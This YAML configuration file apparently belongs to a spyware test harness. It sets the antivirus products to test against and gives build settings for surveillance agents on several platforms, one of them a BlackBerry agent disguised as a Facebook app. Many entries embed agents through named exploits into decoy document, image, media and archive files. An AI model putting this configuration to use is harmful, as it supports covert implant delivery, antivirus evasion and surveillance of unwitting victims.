AVAgent/default.yaml
soldierlist: [adaware,iobit32,bitdef,comodo,fsecure,gdata,drweb,360cn,360cn5,kis32,avg,avg32]
blacklist: [emsisoft,sophos]
crop_whitelist: [kis,kis32]
backend: 192.168.100.201
frontend: 172.20.100.204
nointernetcheck: [zanzara.local, win7zenoav, win7-noav, paradox, avtagent, funff, funie, funch, funwin81]
operation: RiteAV
build_parameters:
linux:
platform_type: desktop
binary: {admin: false, demo: false}
melt: {}
platform: linux
package: {}
osx:
platform_type: desktop
binary: {admin: true, demo: false}
melt: {}
platform: osx
package: {}
windows:
platform_type: desktop
binary: {admin: false, demo: false}
melt: {admin: false, bit64: true, codec: true, scout: true}
platform: windows
meltfile: AVAgent/assets/windows/meltapp.exe
sign: {}
package: {}
windows_elite:
platform_type: desktop
binary: {admin: false, demo: false}
melt: {admin: false, bit64: true, codec: true, scout: false}
platform: windows
meltfile: AVAgent/assets/windows/meltapp.exe
sign: {}
package: {}
windows_soldier:
platform_type: desktop
binary: {admin: false, demo: false}
melt: {admin: false, bit64: true, codec: true, scout: false, soldier: true}
platform: windows
meltfile: AVAgent/assets/windows/meltapp.exe
sign: {}
package: {}
winphone:
platform_type: desktop
binary: {admin: true, demo: false}
melt: {}
platform: winphone
package: {}
android:
platform_type: mobile
binary: {admin: false, demo: false}
melt: {}
platform: android
sign: {}
package: {}
blackberry:
platform_type: mobile
binary: {demo: false}
melt: {appname: facebook, desc: Applicazione utilissima di social network, name: Facebook
Application, vendor: face inc, version: 1.2.3}
package: {type: local}
platform: blackberry
ios:
platform_type: mobile
binary: {demo: false}
melt: {}
platform: ios
package: {type: local}
exploit:
platform_type: desktop
deliver: {user: USERID}
factory: {_id: '000'}
meltfile: AVAgent/assets/windows/meltexploit.txt
generate:
binary: {admin: false, demo: false}
exploit: HT-2012-001
melt: {admin: false, demo: false, scout: true}
platforms: [windows]
melt: {appname: agent.exe, combo: txt, filename: example.txt, input: '000'}
platform: exploit
package: {}
exploit_pdf:
platform_type: desktop
deliver: {user: USERID}
factory: {_id: '000'}
meltfile: AVAgent/assets/windows/meltexploit.pdf
generate:
binary: {admin: false, demo: false}
exploit: HT-2012-001
melt: {admin: false, demo: false, scout: true}
platforms: [windows]
melt: {appname: agent.exe, combo: pdf, filename: example.pdf, input: '000'}
platform: exploit
package: {}
exploit_rtf:
platform_type: desktop
deliver: {user: USERID}
factory: {_id: '000'}
meltfile: AVAgent/assets/windows/meltexploit.rtf
generate:
binary: {admin: false, demo: false}
exploit: HT-2012-001
melt: {admin: false, demo: false, scout: true}
platforms: [windows]
melt: {appname: agent.exe, combo: rtf, filename: example.rtf, input: '000'}
platform: exploit
package: {}
exploit_doc:
platform_type: desktop
deliver: {user: USERID}
factory: {_id: '000'}
meltfile: AVAgent/assets/windows/meltexploit.doc
generate:
binary: {admin: false, demo: false}
exploit: HT-2012-001
melt: {admin: false, demo: false, scout: true}
platforms: [windows]
melt: {appname: agent.exe, combo: doc, filename: example.doc, input: '000'}
platform: exploit
package: {}
exploit_ppt:
platform_type: desktop
deliver: {user: USERID}
factory: {_id: '000'}
meltfile: AVAgent/assets/windows/meltexploit.ppt
generate:
binary: {admin: false, demo: false}
exploit: HT-2012-001
melt: {admin: false, demo: false, scout: true}
platforms: [windows]
melt: {appname: agent.exe, combo: ppt, filename: example.ppt, input: '000'}
platform: exploit
package: {}
exploit_docx:
platform_type: desktop
deliver: {user: USERID}
factory: {_id: '000'}
meltfile: AVAgent/assets/windows/meltexploit.docx
generate:
binary: {admin: false, demo: false}
exploit: HT-2012-001
melt: {admin: false, demo: false, scout: true}
platforms: [windows]
melt: {appname: agent.exe, combo: docx, filename: example.docx, input: '000'}
platform: exploit
package: {}
exploit_ppsx:
platform_type: desktop
deliver: {user: USERID}
factory: {_id: '000'}
meltfile: AVAgent/assets/windows/meltexploit.ppsx
generate:
binary: {admin: false, demo: false}
exploit: HT-2012-001
melt: {admin: false, demo: false, scout: true}
platforms: [windows]
melt: {appname: agent.exe, combo: ppsx, filename: example.ppsx, input: '000'}
platform: exploit
package: {}
exploit_xls:
platform_type: desktop
deliver: {user: USERID}
factory: {_id: '000'}
meltfile: AVAgent/assets/windows/meltexploit.xls
generate:
binary: {admin: false, demo: false}
exploit: HT-2012-001
melt: {admin: false, demo: false, scout: true}
platforms: [windows]
melt: {appname: agent.exe, combo: xls, filename: example.xls, input: '000'}
platform: exploit
package: {}
exploit_rar:
platform_type: desktop
deliver: {user: USERID}
factory: {_id: '000'}
meltfile: AVAgent/assets/windows/meltexploit.rar
generate:
binary: {admin: false, demo: false}
exploit: HT-2012-001
melt: {admin: false, demo: false, scout: true}
platforms: [windows]
melt: {appname: agent.exe, combo: rar, filename: example.rar, input: '000'}
platform: exploit
package: {}
exploit_zip:
platform_type: desktop
deliver: {user: USERID}
factory: {_id: '000'}
meltfile: AVAgent/assets/windows/meltexploit.zip
generate:
binary: {admin: false, demo: false}
exploit: HT-2012-001
melt: {admin: false, demo: false, scout: true}
platforms: [windows]
melt: {appname: agent.exe, combo: zip, filename: example.zip, input: '000'}
platform: exploit
package: {}
exploit_exe:
platform_type: desktop
deliver: {user: USERID}
factory: {_id: '000'}
meltfile: AVAgent/assets/windows/meltapp.exe
generate:
binary: {admin: false, demo: false}
exploit: HT-2012-001
melt: {admin: false, demo: false, scout: true}
platforms: [windows]
melt: {appname: agent.exe, combo: exe, filename: example.exe, input: '000'}
platform: exploit
package: {}
exploit_avi:
platform_type: desktop
deliver: {user: USERID}
factory: {_id: '000'}
meltfile: AVAgent/assets/windows/meltexploit.avi
generate:
binary: {admin: false, demo: false}
exploit: HT-2012-001
melt: {admin: false, demo: false, scout: true}
platforms: [windows]
melt: {appname: agent.exe, combo: avi, filename: example.avi, input: '000'}
platform: exploit
package: {}
exploit_bmp:
platform_type: desktop
deliver: {user: USERID}
factory: {_id: '000'}
meltfile: AVAgent/assets/windows/meltexploit.bmp
generate:
binary: {admin: false, demo: false}
exploit: HT-2012-001
melt: {admin: false, demo: false, scout: true}
platforms: [windows]
melt: {appname: agent.exe, combo: bmp, filename: example.bmp, input: '000'}
platform: exploit
package: {}
exploit_eml:
platform_type: desktop
deliver: {user: USERID}
factory: {_id: '000'}
meltfile: AVAgent/assets/windows/meltexploit.eml
generate:
binary: {admin: false, demo: false}
exploit: HT-2012-001
melt: {admin: false, demo: false, scout: true}
platforms: [windows]
melt: {appname: agent.exe, combo: eml, filename: example.eml, input: '000'}
platform: exploit
package: {}
exploit_gif:
platform_type: desktop
deliver: {user: USERID}
factory: {_id: '000'}
meltfile: AVAgent/assets/windows/meltexploit.gif
generate:
binary: {admin: false, demo: false}
exploit: HT-2012-001
melt: {admin: false, demo: false, scout: true}
platforms: [windows]
melt: {appname: agent.exe, combo: gif, filename: example.gif, input: '000'}
platform: exploit
package: {}
exploit_html:
platform_type: desktop
deliver: {user: USERID}
factory: {_id: '000'}
meltfile: AVAgent/assets/windows/meltexploit.html
generate:
binary: {admin: false, demo: false}
exploit: HT-2012-001
melt: {admin: false, demo: false, scout: true}
platforms: [windows]
melt: {appname: agent.exe, combo: html, filename: example.html, input: '000'}
platform: exploit
package: {}
exploit_jpg:
platform_type: desktop
deliver: {user: USERID}
factory: {_id: '000'}
meltfile: AVAgent/assets/windows/meltexploit.jpg
generate:
binary: {admin: false, demo: false}
exploit: HT-2012-001
melt: {admin: false, demo: false, scout: true}
platforms: [windows]
melt: {appname: agent.exe, combo: jpg, filename: example.jpg, input: '000'}
platform: exploit
package: {}
exploit_mp3:
platform_type: desktop
deliver: {user: USERID}
factory: {_id: '000'}
meltfile: AVAgent/assets/windows/meltexploit.mp3
generate:
binary: {admin: false, demo: false}
exploit: HT-2012-001
melt: {admin: false, demo: false, scout: true}
platforms: [windows]
melt: {appname: agent.exe, combo: mp3, filename: example.mp3, input: '000'}
platform: exploit
package: {}
exploit_png:
platform_type: desktop
deliver: {user: USERID}
factory: {_id: '000'}
meltfile: AVAgent/assets/windows/meltexploit.png
generate:
binary: {admin: false, demo: false}
exploit: HT-2012-001
melt: {admin: false, demo: false, scout: true}
platforms: [windows]
melt: {appname: agent.exe, combo: png, filename: example.png, input: '000'}
platform: exploit
package: {}
exploit_vsd:
platform_type: desktop
deliver: {user: USERID}
factory: {_id: '000'}
meltfile: AVAgent/assets/windows/meltexploit.vsd
generate:
binary: {admin: false, demo: false}
exploit: HT-2012-001
melt: {admin: false, demo: false, scout: true}
platforms: [windows]
melt: {appname: agent.exe, combo: vsd, filename: example.vsd, input: '000'}
platform: exploit
package: {}
selfdel_exploit:
platform_type: desktop
deliver: {user: USERID}
factory: {_id: '000'}
meltfile: AVAgent/assets/windows/meltexploit.txt
generate:
binary: {admin: false, demo: false}
exploit: HT-2014-001
melt: {admin: false, demo: false, scout: true}
platforms: [windows]
melt: {appname: agent.exe, combo: txt, filename: example.txt, input: '000'}
platform: exploit
package: {}